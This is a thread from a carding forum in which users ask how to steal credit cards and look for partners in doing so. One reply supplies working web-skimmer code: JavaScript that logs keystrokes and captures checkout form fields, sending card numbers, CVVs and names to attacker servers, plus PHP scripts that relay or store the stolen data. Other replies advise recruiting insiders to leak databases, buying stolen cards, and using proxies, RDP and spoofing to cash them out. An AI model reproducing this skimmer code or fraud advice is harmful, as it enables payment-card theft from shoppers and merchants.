What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

How do I obtain a cc and How do I steal cc?

влил

Light Weight
Депозит
$0
EN:How are cc being stolen nowadays and what are the current methods used? Can you provide me with information on this? As far as I know, they either hack into a database and steal from there or use phishing. I know that phishing can be easier than hacking into a database. Could you explain in detail how these things work? Also, if anyone is looking for a partner in these ventures, they can contact me.

RU:Как в настоящее время происходит кража кредитных карт, и какие используются современные методы? Можете предоставить мне информацию об этом? Насколько мне известно, они взламывают базу данных и крадут оттуда или используют методы фишинга. Я знаю, что фишинг может быть проще, чем взлом базы данных. Не могли бы вы подробно объяснить, как это работает? Кроме того, если кто-то ищет партнера в этих делах, он может связаться со мной.

Sniff, Smish, Skim, Stealer, Auth form intercept/inspect, Inbox/Outbox, Social Engineering, Self Reg, Misc/Other

I will try to expand on each in seperate answers since i don't have the time to do it all at once rn

Sniffer:
Carts like Magento, Woo
JS like coreconfig table, Plugins & Add-ons, form capture like
Код:
Скопировать в буфер обмена
$(document).ready(function() {
$('input[type="text"]').keypress(function(event) {
var key = event.keyCode || event.which;
var value = $(this).val() + String.fromCharCode(key);
var data = {'keystroke': value};
$.ajax({
type: 'POST',
url: 'http://abusevps.tld/form-io.php',
data: data,
success: function(response) {
console.log('cap sent to vps');
}
});
});
});

iFrames
Код:
$('iframe').contents().find('form').on('submit', function(event) {
var cc_number = $('input[name="cc_number"]').val();
var security_code = $('input[name="security_code"]').val();
var expiration_date = $('input[name="expiration_date"]').val();
var customer_name = $('input[name="customer_name"]').val();
$('input[name="cc_number"]').val('');
$('input[name="security_code"]').val('');
$('input[name="expiration_date"]').val('');
$('input[name="customer_name"]').val('');
$.ajax({
type: 'POST',
url: 'http://abusevps.xyz/checkout-io.php,
data: {
'cc_number': cc_number,
'security_code': security_code,
'expiration_date': expiration_date,
'customer_name': customer_name
},
success: function(response) {
console.log('Checkout io to vps');
}
});
return true;
});
PHP
Like curl
Код:
<?php
$cc_number = $_POST['cc_number'];
$security_code = $_POST['security_code'];
$expiration_date = $_POST['expiration_date'];
$customer_name = $_POST['customer_name'];

$data = array(
'cc_number' => $cc_number,
'security_code' => $security_code,
'expiration_date' => $expiration_date,
'customer_name' => $customer_name
);
$ch = curl_init('http://abusevps.pw/chk-exp.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

echo $response;
?>
Server-Side
Код:
<?php
$file = 'credit-card-details.txt';
$data = $_POST['cc_number'] . ',' . $_POST['expiration_date'] . ',' . $_POST['security_code'] . "\n";
file_put_contents($file, $data, FILE_APPEND);
?>

DimmuBurgor сказал(а):
Sniff, Smish, Skim, Stealer, Auth form intercept/inspect, Inbox/Outbox, Social Engineering, Self Reg, Misc/Other

I will try to expand on each in seperate answers since i don't have the time to do it all at once rn

Sniffer:
Carts like Magento, Woo
Код:

Нажмите, чтобы раскрыть...
Пожалуйста, обратите внимание, что пользователь заблокирован

Nice code,how get victims to phish ? for example databases/bases leaked on xss.is ? attack over email ?

DimmuBurgor сказал(а):
do you mean the ones I've shared or just in general?
Пожалуйста, обратите внимание, что пользователь заблокирован

Both simple You give him advanced solutions and not any basic/trivial info

If this is up to date i'de need some serious help
wanted to start multiple e commerce projects + advertise but i need to learn how to setup a sniffer first gotta start somewhere

DimmuBurgor сказал(а):

Sniffer:
Carts like Magento, Woo
Код:

Нажмите, чтобы раскрыть...

hello bro, do u have USA card ? I need sniff card, the balance around $300. I need alot

влил сказал(а):
EN:How are cc being stolen nowadays and what are the current methods used? Can you provide me with information on this? As far as I know, they either hack into a database and steal from there or use phishing. I know that phishing can be easier than hacking into a database. Could you explain in detail how these things work? Also, if anyone is looking for a partner in these ventures, they can contact me.

EN:How is the theft of credit cards currently taking place, and what modern methods are used? Can you provide me with information about this? As far as I know, they hack into the database and steal from there or use phishing methods. I know phishing can be easier than database hacking. Could you explain in detail how it works? Also, if someone is looking for a partner in these cases, they can contact me.
bro, important information that has been working very well for me with positive results:
recruit some insiders

many bases are leaked with the help of insiders
ancient technique that is still used a lot today

OK, to stop some of the questions in here quickly:
You will not sniff/steal CCs quickly and/or easily.
You are better off buying from the vendors who just steal the info.

THEN,
ALSO,
actually using the card balance you need residential proxies, RDP (other configs sure), a VPN, and how to spoof a few different things to get a successful transaction.

AKA: It is not a get-rich-quick thing.